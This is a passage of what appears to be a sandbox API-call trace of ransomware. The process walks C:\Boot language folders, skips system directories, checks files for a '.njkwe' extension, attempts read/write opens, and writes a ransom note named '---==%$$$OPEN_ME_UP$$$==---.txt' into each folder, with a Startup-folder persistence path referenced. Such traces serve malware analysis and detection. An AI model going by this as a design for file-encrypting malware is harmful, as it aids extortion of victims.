FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e138, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef62cf52, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0065.131] lstrcmpiW (lpString1="nb-NO", lpString2="Windows") returned -1 [0065.131] lstrcmpiW (lpString1="nb-NO", lpString2="$Recycle.bin") returned 1 [0065.131] lstrcmpiW (lpString1="nb-NO", lpString2="System Volume Information") returned -1 [0065.131] lstrcmpiW (lpString1="nb-NO", lpString2="Program Files") returned -1 [0065.131] lstrcmpiW (lpString1="nb-NO", lpString2="Program Files (x86)") returned -1 [0065.131] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO") returned 17 [0065.131] lstrcmpW (lpString1="nb-NO", lpString2=".") returned 1 [0065.131] lstrcmpW (lpString1="nb-NO", lpString2="..") returned 1 [0065.131] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\nb-NO", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0065.131] GetProcessHeap () returned 0xbe0000 [0065.131] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.131] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\*") returned 19 [0065.131] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\nb-NO\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e138, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef62cf52, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a0a0 [0065.132] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.132] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.132] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.132] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.132] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.132] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\.") returned 19 [0065.132] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.132] FindNextFileW (in: hFindFile=0xc1a0a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e138, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef62cf52, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0065.132] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.132] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.132] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.132] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.132] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.132] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\..") returned 20 [0065.132] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.132] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.132] FindNextFileW (in: hFindFile=0xc1a0a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4912aed, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x211543da, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12760, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.132] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0065.132] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.132] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0065.132] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0065.132] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.132] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned 33 [0065.132] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.132] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.133] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0065.133] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.133] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.133] FindNextFileW (in: hFindFile=0xc1a0a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef62cf52, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2fb5e6c, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0065.133] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Windows") returned -1 [0065.133] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.133] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="System Volume Information") returned -1 [0065.133] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files") returned -1 [0065.133] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.133] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\memtest.exe.mui") returned 33 [0065.133] StrStrIW (lpFirst="memtest.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.133] lstrcmpW (lpString1="memtest.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.133] lstrcmpW (lpString1="memtest.exe.mui", lpString2="taridd") returned -1 [0065.133] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\nb-NO\\memtest.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.133] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\memtest.exe.mui" (normalized: "c:\\boot\\nb-no\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.133] FindNextFileW (in: hFindFile=0xc1a0a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef62cf52, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2fb5e6c, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0065.136] FindClose (in: hFindFile=0xc1a0a0 | out: hFindFile=0xc1a0a0) returned 1 [0065.136] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0065.136] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\nb-no\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.138] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0065.139] CloseHandle (hObject=0x428) returned 1 [0065.139] GetProcessHeap () returned 0xbe0000 [0065.139] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.139] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e4fa, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6407cf, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0065.139] lstrcmpiW (lpString1="nl-NL", lpString2="Windows") returned -1 [0065.139] lstrcmpiW (lpString1="nl-NL", lpString2="$Recycle.bin") returned 1 [0065.139] lstrcmpiW (lpString1="nl-NL", lpString2="System Volume Information") returned -1 [0065.139] lstrcmpiW (lpString1="nl-NL", lpString2="Program Files") returned -1 [0065.139] lstrcmpiW (lpString1="nl-NL", lpString2="Program Files (x86)") returned -1 [0065.139] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL") returned 17 [0065.139] lstrcmpW (lpString1="nl-NL", lpString2=".") returned 1 [0065.139] lstrcmpW (lpString1="nl-NL", lpString2="..") returned 1 [0065.139] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\nl-NL", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0065.139] GetProcessHeap () returned 0xbe0000 [0065.139] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.140] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\*") returned 19 [0065.140] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\nl-NL\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e4fa, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6407cf, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a220 [0065.140] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.140] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.140] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.140] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.140] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.140] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\.") returned 19 [0065.140] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.140] FindNextFileW (in: hFindFile=0xc1a220, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e4fa, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6407cf, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0065.140] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.140] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.140] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.140] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.140] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.140] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\..") returned 20 [0065.140] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.140] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.140] FindNextFileW (in: hFindFile=0xc1a220, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4912aed, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x211543da, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13160, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.140] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0065.140] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.140] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0065.140] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0065.140] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.140] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned 33 [0065.140] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.140] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.140] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0065.140] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.140] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.141] FindNextFileW (in: hFindFile=0xc1a220, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6407cf, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2fb5e6c, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0065.141] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Windows") returned -1 [0065.141] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.141] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="System Volume Information") returned -1 [0065.141] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files") returned -1 [0065.141] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.141] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\memtest.exe.mui") returned 33 [0065.141] StrStrIW (lpFirst="memtest.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.141] lstrcmpW (lpString1="memtest.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.141] lstrcmpW (lpString1="memtest.exe.mui", lpString2="taridd") returned -1 [0065.141] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\nl-NL\\memtest.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.141] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\memtest.exe.mui" (normalized: "c:\\boot\\nl-nl\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.141] FindNextFileW (in: hFindFile=0xc1a220, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6407cf, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2fb5e6c, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0065.142] FindClose (in: hFindFile=0xc1a220 | out: hFindFile=0xc1a220) returned 1 [0065.142] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0065.142] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\nl-nl\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.143] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0065.144] CloseHandle (hObject=0x428) returned 1 [0065.144] GetProcessHeap () returned 0xbe0000 [0065.144] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.144] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65403a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef65403a, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0065.144] lstrcmpiW (lpString1="pl-PL", lpString2="Windows") returned -1 [0065.144] lstrcmpiW (lpString1="pl-PL", lpString2="$Recycle.bin") returned 1 [0065.144] lstrcmpiW (lpString1="pl-PL", lpString2="System Volume Information") returned -1 [0065.144] lstrcmpiW (lpString1="pl-PL", lpString2="Program Files") returned -1 [0065.145] lstrcmpiW (lpString1="pl-PL", lpString2="Program Files (x86)") returned -1 [0065.145] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL") returned 17 [0065.145] lstrcmpW (lpString1="pl-PL", lpString2=".") returned 1 [0065.145] lstrcmpW (lpString1="pl-PL", lpString2="..") returned 1 [0065.145] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\pl-PL", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0065.145] GetProcessHeap () returned 0xbe0000 [0065.145] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.145] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\*") returned 19 [0065.145] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pl-PL\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65403a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef65403a, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19ea0 [0065.145] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.145] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.145] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.145] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.145] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.145] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\.") returned 19 [0065.145] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.145] FindNextFileW (in: hFindFile=0xc19ea0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65403a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef65403a, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0065.145] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.145] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.145] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.145] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.145] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.145] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\..") returned 20 [0065.145] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.145] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.145] FindNextFileW (in: hFindFile=0xc19ea0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4912aed, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f58, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.145] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0065.145] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.145] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0065.145] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0065.145] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.145] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned 33 [0065.146] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.146] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.146] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0065.146] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.146] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.146] FindNextFileW (in: hFindFile=0xc19ea0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65403a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f8fc0d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0065.146] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Windows") returned -1 [0065.146] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.146] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="System Volume Information") returned -1 [0065.146] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files") returned -1 [0065.146] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.146] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: 